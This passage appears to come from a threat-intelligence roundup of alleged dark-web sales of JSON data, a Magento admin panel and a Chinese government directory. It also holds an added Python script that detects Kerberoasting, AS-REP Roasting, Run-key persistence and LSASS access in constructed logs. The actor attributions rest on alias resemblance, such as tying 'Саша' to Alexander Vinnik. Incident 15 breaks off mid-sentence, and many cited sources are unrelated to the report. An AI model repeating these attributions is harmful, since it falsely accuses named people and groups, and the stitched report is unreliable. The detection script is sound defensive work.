  • Published URL: https://breach-forums.st/Thread-SELLING-Kraken-Email-Checker-%E2%80%93-80-Accuracy-800-CPM-500k-Emails-LIMITED-OFFER-%E2%80%93-10-COPIES
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/13fd3e7f-09fc-4ce3-ba0b-1c837b5dc6dc.png

Incident 13: Alleged Sale of Unknown Source JSON Data

  • Date & Time of Breach: 2025-06-06T09:15:55Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling several live.json files, including posts, comments, albums, and photos.
  • Affected Entity Context: No specific victim country, industry, or organization is identified. The incident involves the sale of various types of JSON data.
  • Associated Threat Actor Profile:
  • Name/Alias(es): Саша, also known as Alexander Vinnik or Sasha WME.42
  • Country of Origin/Affiliation: Russian entrepreneur.42
  • Motivations: Money laundering, facilitating illicit transactions for cybercriminals.42
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling live JSON files containing various types of data. While Alexander Vinnik is primarily known for money laundering through cryptocurrency exchanges, the sale of stolen data is a common activity in the cybercrime ecosystem he was allegedly involved in.42
  • General TTPs and Notable Past Activities of the Actor: Alexander Vinnik was the co-founder of the BTC-e cryptocurrency exchange, which was allegedly used to launder billions of dollars for cybercriminals worldwide. Some funds processed by BTC-e were even traced to Fancy Bear, a Russian military intelligence hacking unit. His case highlights the critical role of cryptocurrency exchanges in facilitating large-scale cybercrime and potentially supporting nation-state cyber operations.42
  • Technical Context & Attack Chain: The incident involves the alleged sale of JSON data, suggesting a data leak from an unspecified source. The term “live” implies the data is current and actively being updated or accessed. The method of data acquisition is not detailed.
  • References:
  • Published URL: https://leakbase.la/threads/json-files.39154/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/1a87a6ef-ca10-4f58-bc58-90d7db8e26fb.PNG

Incident 14: Alleged Sale of Magento Admin Panel Tied to U.S. Cloud Services

  • Date & Time of Breach: 2025-06-06T08:40:30Z
  • Incident Summary & Initial Impact: The threat actor claims to be selling access to a Magento-based admin panel with full rights, allegedly tied to a U.S. cloud service for files and software transactions.
  • Affected Entity Context: The victim country is the USA, but no specific victim industry or organization is identified beyond a “U.S. cloud service.” Magento is a popular e-commerce platform.
  • Associated Threat Actor Profile:
  • Name/Alias(es): black18, also known as BlackSuit, a successor to the Royal ransomware group.43
  • Country of Origin/Affiliation: Financially motivated threat actor.43
  • Motivations: Financial gain through extortion, demanding high ransoms.43
  • Observed Tactics, Techniques, and Procedures (TTPs) specific to this incident: The actor is selling access to an admin panel with full rights. BlackSuit is known to partner with initial access brokers to facilitate their intrusions, and selling initial access is a common tactic for financially motivated groups.43
  • General TTPs and Notable Past Activities of the Actor: BlackSuit’s initial access vectors include phishing campaigns (spearphishing attachments), Remote Desktop Protocol (RDP) exploitation (brute-force attacks or exploiting public-facing vulnerabilities), and partnerships with initial access brokers. They employ double extortion tactics, exfiltrating sensitive data before encryption. They utilize partial encryption techniques to speed up attacks and evade detection. Cobalt Strike is a primary tool for execution and lateral movement, alongside PowerShell scripting. Persistence is established via registry Run keys, and they use credential access techniques like AS-REP Roasting, Kerberoasting, and LSASS memory dumping.43
  • Technical Context & Attack Chain: The incident involves the alleged sale of full administrative access to a Magento panel hosted on a U.S. cloud service. This implies a successful compromise of the cloud environment or the Magento application itself, likely through exploitation of vulnerabilities or stolen credentials, consistent with BlackSuit’s initial access methods.
  • References:
  • Published URL: https://forum.exploit.in/topic/260382/
  • Screenshots: https://d34iuop8pidsy8.cloudfront.net/36db52c3-7bb7-49e7-aa9d-e8522319a70d.PNG
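The BlackSuit TTPs listed above (AS-REP Roasting, Kerberoasting, Run-key persistence, LSASS memory access) each leave a recognisable trace in Windows Security and Sysmon logs. The following detection heuristics are an added example written for this report, not code from the report's authors or from any cited vendor; the event records are constructed, the field names follow the Windows 4768/4769 and Sysmon 10/13 event schemas, and the threshold and the System32 allow-list are assumed tuning values, not recommendations from the page.

```python
"""Detection heuristics for four BlackSuit TTPs named in the report, run over
constructed Windows Security (4768/4769) and Sysmon (10/13) events.
Added example; events are constructed, not captured from a real incident."""
from collections import Counter, defaultdict

# Constructed events, flattened to the fields the rules need.
EVENTS = [
    # Kerberoasting: one requester pulls RC4 (0x17) service tickets for several
    # user-account SPNs in quick succession.
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.23"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.23"},
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.23"},
    # Benign: AES (0x12) ticket for a machine account (name ends with $).
    {"EventID": 4769, "TargetUserName": "jdoe@CORP.EXAMPLE", "ServiceName": "WS0042$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.5.23"},
    # AS-REP Roasting: TGT request for an account with pre-authentication disabled.
    {"EventID": 4768, "TargetUserName": "legacy_app", "PreAuthType": "0",
     "TicketEncryptionType": "0x17", "IpAddress": "10.0.5.23"},
    # Benign TGT request with normal pre-auth (type 2 = PA-ENC-TIMESTAMP).
    {"EventID": 4768, "TargetUserName": "jdoe", "PreAuthType": "2",
     "TicketEncryptionType": "0x12", "IpAddress": "10.0.5.23"},
    # Sysmon 13 (registry value set): Run-key persistence written by PowerShell.
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": r"C:\Users\Public\upd.exe"},
    # Sysmon 10 (process access): a user-writable binary opens lsass.exe with VM_READ.
    {"EventID": 10, "SourceImage": r"C:\Users\Public\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Benign Sysmon 10: system binary, no VM_READ bit in the access mask.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400"},
]

RC4_HMAC = 0x17            # Kerberos etype used by roasting tools for crackable tickets
PROCESS_VM_READ = 0x10     # access-mask bit needed to read LSASS memory
KERBEROAST_THRESHOLD = 3   # distinct SPNs per requester before alerting (assumed tuning)


def detect(events):
    """Return a list of (rule, detail) alerts for the given events."""
    alerts = []
    spns_per_requester = defaultdict(set)
    for e in events:
        eid = e["EventID"]
        if eid == 4769:
            enc = int(e["TicketEncryptionType"], 16)
            svc = e["ServiceName"]
            # RC4 tickets for user-account SPNs only (skip machine accounts and krbtgt).
            if enc == RC4_HMAC and not svc.endswith("$") and svc.lower() != "krbtgt":
                spns_per_requester[(e["TargetUserName"], e["IpAddress"])].add(svc)
        elif eid == 4768:
            # PreAuthType 0 means the TGT was issued without pre-authentication.
            if e.get("PreAuthType") == "0":
                alerts.append(("asrep_roasting", f"{e['TargetUserName']} from {e['IpAddress']}"))
        elif eid == 13:
            if "\\currentversion\\run" in e["TargetObject"].lower():
                alerts.append(("run_key_persistence", f"{e['TargetObject']} -> {e['Details']}"))
        elif eid == 10:
            granted = int(e["GrantedAccess"], 16)
            # Crude allow-list for System32 sources; tune per environment (assumption).
            if (e["TargetImage"].lower().endswith("\\lsass.exe")
                    and granted & PROCESS_VM_READ
                    and not e["SourceImage"].lower().startswith("c:\\windows\\system32\\")):
                alerts.append(("lsass_access", f"{e['SourceImage']} access={e['GrantedAccess']}"))
    for (user, ip), spns in spns_per_requester.items():
        if len(spns) >= KERBEROAST_THRESHOLD:
            alerts.append(("kerberoasting",
                           f"{user} from {ip} requested {len(spns)} RC4 service tickets"))
    return alerts


def alert_rules(events):
    """Count alerts per rule, sorted by rule name."""
    return sorted(Counter(rule for rule, _ in detect(events)).items())


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"[{rule}] {detail}")
```

Run against the constructed events, the script raises one alert per rule and stays silent on the AES machine-account ticket, the pre-authenticated TGT request and the csrss.exe access. In production the Kerberoasting rule should also be windowed in time, and the System32 allow-list replaced by a signed-image or known-EDR check.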

Incident 15: Alleged database leak of Directory of Government in China

  • Date & Time of Breach: 2025-06-06T06:54:23Z
  • Incident Summary & Initial Impact: The threat actor claims to have leaked the database of the Directory of Government in China. The compromised data contains government leadership profiles, department structures, and contact details. It also includes national laws, policies, and official announcements. Additionally, it holds economic statistics, public service information, and records of diplomatic activities and anti-corruption efforts.
  • Affected Entity Context: The Directory of Government in China refers to the structure and information of the Chinese government. The Chinese government is a Leninist “

Works cited

  1. JKT48 Showroom Fanmade – Apps on Google Play, accessed June 6, 2025, https://play.google.com/store/apps/datasafety?id=com.inzoid.jkt48showroom
  2. Leviathan: Threat Actor Profile – Cyble, accessed June 6, 2025, https://cyble.com/threat-actor-profiles/leviathan/
  3. Dinas PUBMTR Sumatera Selatan, accessed June 6, 2025, https://dpubmtr.sumselprov.go.id/
  4. Analyzing DEEP#DRIVE: North Korean Threat Actors Observed …, accessed June 6, 2025, https://www.securonix.com/blog/analyzing-deepdrive-north-korean-threat-actors-observed-exploiting-trusted-platforms-for-targeted-attacks/
  5. BlackMatter Ransomware | CISA, accessed June 6, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-291a
  6. BlackMatter Ransomware: In-Depth Analysis & Recommendations …, accessed June 6, 2025, https://www.varonis.com/blog/blackmatter-ransomware
  7. What are the Types of Cyber Threat Actors? – Sophos, accessed June 6, 2025, https://www.sophos.com/en-us/cybersecurity-explained/threat-actors
  8. Top 5 Underground Hacker Forums That are Accessible via Your Web Browsers such as Google Chrome, Firefox, and Internet Explorer – SOCRadar® Cyber Intelligence Inc., accessed June 6, 2025, https://socradar.io/top-5-underground-hacker-forums-that-are-accessible-via-your-web-browsers-such-as-google-chrome-firefox-and-internet-explorer/
  9. Bolt (company) – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Bolt_(company)
  10. Peoples Cyber Army Of Russia | Threat Actor Profile | Cyble, accessed June 6, 2025, https://cyble.com/threat-actor-profiles/peoples-cyber-army-of-russia/
  11. How World Travel Created The Liberty City Preservation Project : r/Games – Reddit, accessed June 6, 2025, https://www.reddit.com/r/Games/comments/1hsol2j/how_world_travel_created_the_liberty_city/
  12. Cyber scammer steals $98K from 82-year-old woman who is now homeless, accessed June 6, 2025, https://www.local10.com/news/local/2022/05/20/cyber-scammer-steals-98k-from-82-year-old-woman-who-is-now-homeless/
  13. A Major Terror Plot Interrupted — or a ‘Setup’? – PBS, accessed June 6, 2025, https://www.pbs.org/wgbh/frontline/article/video-liberty-city-seven-terror-plot-setup-in-the-shadow-of-911/
  14. Black Basta-like Microsoft Teams phishing leads to novel backdoor | SC Media, accessed June 6, 2025, https://www.scworld.com/news/black-basta-like-microsoft-teams-phishing-leads-to-novel-backdoor
  15. Grand Theft Auto: Liberty City Stories – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Grand_Theft_Auto:_Liberty_City_Stories
  16. Rockstar Games has seemingly shut down the Liberty City Preservation Project mod for GTA 5. : r/pcgaming – Reddit, accessed June 6, 2025, https://www.reddit.com/r/pcgaming/comments/1i29413/rockstar_games_has_seemingly_shut_down_the/
  17. What is a Cyber Threat Actor? | CrowdStrike, accessed June 6, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
  18. Uruguay – U.S. Department of Labor, accessed June 6, 2025, https://www.dol.gov/sites/dolgov/files/ILAB/child_labor_reports/tda2015/uruguay.pdf
  19. E_Libro_abril_2012 – Biblioteca Universidad de Sevilla, accessed June 6, 2025, https://bib.us.es/Soporte-news/common/elibro_altas_abril_2012.xls
  20. Russia-aligned hackers target Tajikistan in new espionage campaign, accessed June 6, 2025, https://therecord.media/russia-hackers-target-tajikistan-espionage
  21. Organization Info – Ministry of Finance – Thailand, accessed June 6, 2025, http://www2.mof.go.th/accessibility/www2government_agencies.html
  22. Mariah Carey unveils ‘Type Dangerous’ – listen and see the lyrics – Entertainment Focus, accessed June 6, 2025, https://entertainment-focus.com/2025/06/06/mariah-carey-unveils-type-dangerous-listen-and-see-the-lyrics/
  23. Walter Presents: ‘Detective Surprenant’ season 1 arrives on C4 Streaming in July, accessed June 6, 2025, https://entertainment-focus.com/2025/05/31/walter-presents-detective-surprenant-season-1-arrives-on-c4-streaming-in-july/
  24. ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware Gangs for Double Extortion – The Hacker News, accessed June 6, 2025, https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
  25. CTI Roundup: Deepfakes, ToyMaker IAB, and ClickFix | Tanium, accessed June 6, 2025, https://www.tanium.com/blog/cti-roundup-deepfakes-toymaker-iab-clickfix/
  26. company-background – KASIKORNBANK, accessed June 6, 2025, https://www.kasikornbank.com/en/about/pages/company-background.aspx
  27. Tactics and Motivations of Modern Hacktivists – CYFIRMA, accessed June 6, 2025, https://www.cyfirma.com/research/tactics-and-motivations-of-modern-hacktivists/
  28. Warning: Cyber attacks have been used to create hatred against …, accessed June 6, 2025, https://blog.cofact.org/warning-cyber-attacks-have-been-used-to-create-hatred-against-cambodians/
  29. Exploring Online Structures on Chinese Government Portals – ResearchGate, accessed June 6, 2025, https://www.researchgate.net/publication/228256126_Exploring_Online_Structures_on_Chinese_Government_Portals_Citizen_Political_Participation_and_Government_Legitimation
  30. Study of the service functions of health facilities in Yogyakarta Special Province – E3S Web of Conferences, accessed June 6, 2025, https://www.e3s-conferences.org/articles/e3sconf/pdf/2021/101/e3sconf_icst2021_07006.pdf
  31. China-Linked APT Aquatic Panda: 10-Month Campaign, 7 Global …, accessed June 6, 2025, https://thehackernews.com/2025/03/china-linked-apt-aquatic-panda-10-month.html
  32. What the 2025 SASI Report reveals – Kaseya, accessed June 6, 2025, https://www.kaseya.com/?post_type=post&p=23670
  33. FBI and European partners seize major malware network in blow to global cybercrime, accessed June 6, 2025, https://apnews.com/article/cybercrime-malware-fbi-takdown-ce415e9ea0f11d31e6cf3e401a264d3c
  34. Authorities arrest man allegedly running ‘likely world’s largest ever’ cybercrime botnet, accessed June 6, 2025, https://apnews.com/article/botnet-cybercrime-pandemic-fraud-malware-identity-theft-online-fraud-32ac98b96b53e8d293d1e8c552a1d8f1
  35. National Cyber Investigative Joint Task Force – FBI, accessed June 6, 2025, https://www.fbi.gov/investigate/cyber/national-cyber-investigative-joint-task-force
  36. What is the Dark Web? How to access it – Kaspersky, accessed June 6, 2025, https://www.kaspersky.com/resource-center/threats/deep-web
  37. How was this dark web user caught? : r/TOR – Reddit, accessed June 6, 2025, https://www.reddit.com/r/TOR/comments/1jzzzwc/how_was_this_dark_web_user_caught/
  38. Hack Forums – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Hack_Forums
  39. Microsoft and CrowdStrike Launch Shared Threat Actor Glossary to Cut Attribution Confusion – The Hacker News, accessed June 6, 2025, https://thehackernews.com/2025/06/microsoft-and-crowdstrike-launch-shared.html
  40. Anonymous Investigator Exposed Entire Conti Ransomware Gang Group Photos and Location – Cyber Press, accessed June 6, 2025, https://cyberpress.org/anonymous-investigator-exposed-entire-conti-ransomware/
  41. Top 10 Dark Web Forums Dominating Cybercrime – Threat Intelligence Lab, accessed June 6, 2025, https://threatintelligencelab.com/blog/top-10-dark-web-forums-dominating-cybercrime/
  42. Alexander Vinnik – Wikipedia, accessed June 6, 2025, https://en.wikipedia.org/wiki/Alexander_Vinnik
  43. BlackSuit Ransomware Group: What Have Changed After Royal …, accessed June 6, 2025, https://www.picussecurity.com/resource/blog/blacksuit-ransomware-group